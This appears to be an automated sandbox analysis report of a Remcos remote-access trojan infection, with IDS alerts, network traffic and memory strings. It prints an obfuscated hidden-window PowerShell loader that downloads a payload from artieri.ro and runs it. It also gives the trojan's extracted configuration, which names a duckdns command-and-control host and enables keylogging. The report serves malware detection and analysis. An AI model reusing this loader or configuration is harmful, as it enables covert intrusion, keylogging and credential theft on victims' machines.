FemaN recT Sta Ste1 Cab0Jux .Ixo 0 For;Sind TalaWGorbiVaesnHem 6.tvk4Afst; v.d SattxSt.b6Kabo4p.lk; Pet Visur etev Udh:Khed1Agit3Brig1Else. Lai0Edul)Deli spirGSlage rocLandkDemooW ys/ .ri2Di k0 .en1,ijo0Rest0Auto1Enla0Id.o1S am BosFAfskiMarkrP omeF ihf teo,entxRobo/U es1Sand3Trav1 Cou.Indl0a em ';$Deglutitive=Foreslaa 'MotiuSne,SHjesE An.RBou - RedaOto G K tE chenN nsTOxgo ';$Spisekortet=Foreslaa 'Glach P.itSubstMod.pDogg:Tiec/ I.t/ConnaHererFesttu.viiansaeFa nr diriCi r.cl.nrDecaohypn/At ogSfol/TessSPersk R,liEksifSko f gale.uchrNor d ErnkTy ek Un eBor re itsSprj.NunnpObstcEngrx.jla ';$Allineate=Foreslaa 'Fila>F.ru ';$Liljekonvals=Foreslaa '.amuIBisaePo.kxCor ';$Brneormens='Sybaritternes';$Omittanceronsided='\Rgnes.Und';Heraclitean (Foreslaa 'Forb$Ko,fgShorLUnifOEpigBC moASaprlOmf :kautFPromOU gyZPoutIForfnSu,pe AddSLunesKins=Co.e$ Lu,eQuesNSvnlVDell:UnscanonvPRingpDisuDkakiA omaTEquiAThys+Komp$ oodoSn wmU piiNoonTAwarTMag ABearnzibeCFortEUndeRKil o O,enYppesSystiAftedFarieDiopdMukk ');Heraclitean (Foreslaa 'or a$SvorG L,vLCe.tOko,mbSolba HypLOut,:WaremWearA P arU,vojBenfU So,Nfor Sanop= Cos$ConuSH.ftPFan I IsosRochELat k chaOUncorOmk,tCherelierTNe.p.Es asOrieP StrLS vsiLocutAfgi( Min$AkkuaG nzl CollPhalI BdeN higeS ngA ArmtIliaeTric) Sta ');Heraclitean (Foreslaa 'Pane[EscoNMythEDrysTHelt.scotS nhETovbrPladvRdbrICentCAfb EVas p ynaOO.tbIBedsnParat VapM orkaForbnMarmapenngHoppeShirrHals].nal:Leve:,uttSHov elovmcDisbU ,arRErriIEschTU bryDelkp AntRTeosOTunntKulkO NolCUdhooRendlPe.s Prey=Data U,or[ uleN ukeToldT Gez.Af,aSKl,keConscFormuNe tRManuIGysetspiryPrevPc.arrunr,OStamtCe loPhasCStamoD sil NomtaqqaY F lpschiE Ufo]Fend:E.cy:Rstetw nwlOmk sBerr1For,2Siti ');$Spisekortet=$marjuns[0];$Resident=(Foreslaa 'Para$Carag,verl FebOForebSe mAbattLRveh: ordoGoosVW geE EverEupssSu cp Ad rprofiG,lenI nkGHyraE,kerLskn.SCandEs bcRDe h=Fljenu.trE ExeWNon.-B skoBarnbTrskjWoodeOptrcUtydT Pre UncsWresY SansStertH,tteArmomPost. ditnNitrET.avto pa. Sumw D mEZealb ealcSuboLUntwiPerie PrenIntetTh e ');Heraclitean ($Resident);Heraclitean (Foreslaa 'Hand$klagOPecuvDyste HalrSt,msMundps,ntr ReniV ounTriagLygteS ralSplasKo oe Gadr.kol. Lo
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI;function Foreslaa($Tvivlstilfldet){If ($Omittancesforstrke116) {$Photoelectronics++;}$Transformationsprocesser=$Selskabsrevisors+$Tvivlstilfldet.'Length'-$Photoelectronics; for( $Omittance=4;$Omittance -lt $Transformationsprocesser;$Omittance+=5){$Benzanthrone++;$Vandsskader+=$Tvivlstilfldet[$Omittance];$Styreformerne15='Uproblematiske';}$Vandsskader;}function Heraclitean($Shagrag){ & ($Liljekonvals) ($Shagrag);}$Noden=Foreslaa 'CuprMTorpoStigzSc tiUninlS orlCarbaSkul/Lige ';$Noden+=Foreslaa 'Intr5 od.Slip0Poli Omf( Ed WBairiPreinRummd In oRandwHumosKjru FemaN recT Sta Ste1 Cab0Jux .Ixo 0 For;Sind TalaWGorbiVaesnHem 6.tvk4Afst; v.d SattxSt.b6Kabo4p.lk; Pet Visur etev Udh:Khed1Agit3Brig1Else. Lai0Edul)Deli spirGSlage rocLandkDemooW ys/ .ri2Di k0 .en1,ijo0Rest0Auto1Enla0Id.o1S am BosFAfskiMarkrP omeF ihf teo,entxRobo/U es1Sand3Trav1 Cou.Indl0a em ';$Deglutitive=Foreslaa 'MotiuSne,SHjesE An.RBou - RedaOto G K tE chenN nsTOxgo ';$Spisekortet=Foreslaa 'Glach P.itSubstMod.pDogg:Tiec/ I.t/ConnaHererFesttu.viiansaeFa nr diriCi r.cl.nrDecaohypn/At ogSfol/TessSPersk R,liEksifSko f gale.uchrNor d ErnkTy ek Un eBor re itsSprj.NunnpObstcEngrx.jla ';$Allineate=Foreslaa 'Fila>F.ru ';$Liljekonvals=Foreslaa '.amuIBisaePo.kxCor ';$Brneormens='Sybaritternes';$Omittanceronsided='\Rgnes.Und';Heraclitean (Foreslaa 'Forb$Ko,fgShorLUnifOEpigBC moASaprlOmf :kautFPromOU gyZPoutIForfnSu,pe AddSLunesKins=Co.e$ Lu,eQuesNSvnlVDell:UnscanonvPRingpDisuDkakiA omaTEquiAThys+Komp$ oodoSn wmU piiNoonTAwarTMag ABearnzibeCFortEUndeRKil o O,enYppesSystiAftedFarieDiopdMukk ');Heraclitean (Foreslaa 'or a$SvorG L,vLCe.tOko,mbSolba HypLOut,:WaremWearA P arU,vojBenfU So,Nfor Sanop= Cos$ConuSH.ftPFan I IsosRochELat k chaOUncorOmk,tCherelierTNe.p.Es asOrieP StrLS vsiLocutAfgi( Min$AkkuaG nzl CollPhalI BdeN higeS ngA ArmtIliaeTric) Sta ');Heraclitean (Foreslaa 'Pane[EscoNMythEDrysTHelt.scotS nhETovbrPladvRdbrICentCAfb EVas p ynaOO.tbIBedsnParat VapM orkaForbnMarmapenngHoppeShirrHals].nal:Leve:,uttSHov elovmcDisbU ,arRErriIEschTU bryDelkp AntRTeosOTunntKulkO NolCUdhooRendlPe.s Prey=Data U,or[ uleN ukeToldT Gez.Af,aSKl,keConscFormuNe tRManuIGysetspiryPrevPc.arrunr,OStamtCe loPhasCStamoD sil NomtaqqaY F lpschiE Ufo]Fend:E.cy:Rstetw nwlOmk sBerr1For,2Siti ');$Spisekortet=$marjuns[0];$Resident=(Foreslaa 'Para$Carag,verl FebOForebSe mAbattLRveh: ordoGoosVW geE EverEupssSu cp Ad rprofiG,lenI nkGHyraE,kerLskn.SCandEs bcRDe h=Fljenu.trE ExeWNon.-B skoBarnbTrskjWoodeOptrcUtydT Pre UncsWresY SansStertH,tteArmomPost. ditnNitrET.avto pa. Sumw D mEZealb ealcSuboLUntwiPerie PrenIntetTh e ');Heraclitean ($Resident);Heraclitean (Foreslaa 'Hand$klagOPecuvDyste HalrSt,msMundps,ntr ReniV ounTriagLygteS ralSplasKo oe Gadr.kol. LobHHugheTribaRet d CoveSta

                Stealing of Sensitive Information

                barindex
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 5172, TargetFilename: C:\ProgramData\remcos\logs.dat
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-17T14:18:29.043578+020020229301A Network Trojan was detected20.109.210.53443192.168.2.449732TCP
                2024-10-17T14:18:57.807542+020020229301A Network Trojan was detected20.109.210.53443192.168.2.462775TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-17T14:19:06.734289+020020365941Malware Command and Control Activity Detected192.168.2.462802193.187.91.21653848TCP
                2024-10-17T14:19:08.953036+020020365941Malware Command and Control Activity Detected192.168.2.462817193.187.91.21653848TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-17T14:19:08.588027+020028033043Unknown Traffic192.168.2.462818178.237.33.5080TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["renajazinw.duckdns.org:53848:1"], "Assigned name": "Nbuild", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "Application path", "Copy file": "Windeep.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-JTPTLW", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "AppDir", "Keylog folder": "remcos"}
                Source: Yara matchFile source: 00000009.00000002.3037991742.00000000002AE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3042211181.00000000062AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.2403120144.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3042429182.00000000062D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5172, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Source: unknownHTTPS traffic detected: 89.44.138.129:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 89.44.138.129:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2153152269.00000000073E9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ore.pdbarj source: powershell.exe, 00000006.00000002.2153152269.00000000073E9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2153152269.00000000073E9000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21F510F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_21F510F1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407EF8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407898

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:62802 -> 193.187.91.216:53848
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:62817 -> 193.187.91.216:53848
                Source: Malware configuration extractorURLs: renajazinw.duckdns.org
                Source: unknownDNS query: name: renajazinw.duckdns.org
                Source: global trafficTCP traffic: 192.168.2.4:62802 -> 193.187.91.216:53848
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:62818 -> 178.237.33.50:80
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:62775
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49732
                Source: global trafficHTTP traffic detected: GET /g/Skifferdkkers.pcx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: artieri.roConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /g/Skifferdkkers.pcx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: artieri.roConnection: Keep-Alive
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /g/Skifferdkkers.pcx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: artieri.roConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /g/MihrGCaVzvslPdUujzk140.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: artieri.roConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /g/Skifferdkkers.pcx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: artieri.roConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /g/MihrGCaVzvslPdUujzk140.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: artieri.roCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: msiexec.exe, 00000009.00000002.3056080933.0000000021F20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.2410026590.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: msiexec.exe, msiexec.exe, 00000010.00000002.2410026590.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: msiexec.exe, 0000000D.00000003.2427311785.0000000004677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2427159033.0000000004677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2422765088.000000000467E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: msiexec.exe, 0000000D.00000003.2427311785.0000000004677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2427159033.0000000004677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2422765088.000000000467E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: bhv68C0.tmp.13.drString found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
                Source: bhv68C0.tmp.13.drString found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
                Source: msiexec.exe, 00000009.00000002.3056539906.00000000227A0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: msiexec.exe, 00000009.00000002.3056539906.00000000227A0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: artieri.ro
                Source: global trafficDNS traffic detected: DNS query: renajazinw.duckdns.org
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: powershell.exe, 00000002.00000002.1943655705.00000267B1EF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943655705.00000267B1A45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943655705.00000267B036C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943655705.00000267B1EDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://artieri.ro
                Source: msiexec.exe, 00000009.00000002.3042211181.000000000628E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3055408372.0000000021AE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://artieri.ro/g/MihrGCaVzvslPdUujzk140.bin
                Source: msiexec.exe, 00000009.00000002.3042211181.000000000628E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://artieri.ro/g/MihrGCaVzvslPdUujzk140.binT
                Source: msiexec.exe, 00000009.00000002.3042211181.000000000628E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://artieri.ro/g/MihrGCaVzvslPdUujzk140.binU
                Source: powershell.exe, 00000002.00000002.1943655705.00000267B036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://artieri.ro/g/Skifferdkkers.pcxP
                Source: powershell.exe, 00000006.00000002.2129665169.0000000004AE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://artieri.ro/g/Skifferdkkers.pcxXR
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                Source: powershell.exe, 00000006.00000002.2153152269.00000000073E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                Source: msiexec.exe, 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2429498672.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2430114623.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3042429182.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2430472905.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2364773419.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2402846377.000000000631E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3042211181.0000000006273000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2406404787.0000000006327000.00000004.00000020.00020000.00000000.sdmp, bhv68C0.tmp.13.drString found in binary or memory: http://geoplugin.net/json.gp
                Source: msiexec.exe, 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpC
                Source: msiexec.exe, 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpH
                Source: msiexec.exe, 00000009.00000003.2429498672.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2430114623.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3042429182.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2430472905.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2364773419.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2402846377.000000000631E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2406404787.0000000006327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpP
                Source: msiexec.exe, 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp_
                Source: msiexec.exe, 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpk
                Source: msiexec.exe, 00000009.00000002.3042211181.00000000062AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpxe
                Source: msiexec.exe, 00000009.00000002.3042211181.00000000062AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpxe2
                Source: powershell.exe, 00000002.00000002.1974162438.00000267C01B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2146151980.00000000059FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0:
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0H
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0I
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0Q
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://ocsp.msocsp.com0
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://ocsp.msocsp.com0S
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://ocspx.digicert.com0E
                Source: powershell.exe, 00000006.00000002.2129665169.0000000004AE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.1943655705.00000267B0141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2129665169.0000000004991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000006.00000002.2129665169.0000000004AE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://www.digicert.com/CPS0~
                Source: msiexec.exe, msiexec.exe, 00000010.00000002.2410026590.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: msiexec.exe, msiexec.exe, 00000010.00000002.2410026590.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000003.2409759123.00000000036BD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2409782092.00000000036BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: msiexec.exe, 00000009.00000002.3056080933.0000000021F20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.2410026590.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: msiexec.exe, 00000009.00000002.3056080933.0000000021F20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.2410026590.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                Source: msiexec.exe, 00000010.00000003.2409759123.00000000036BD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2409782092.00000000036BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comta
                Source: bhv68C0.tmp.13.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
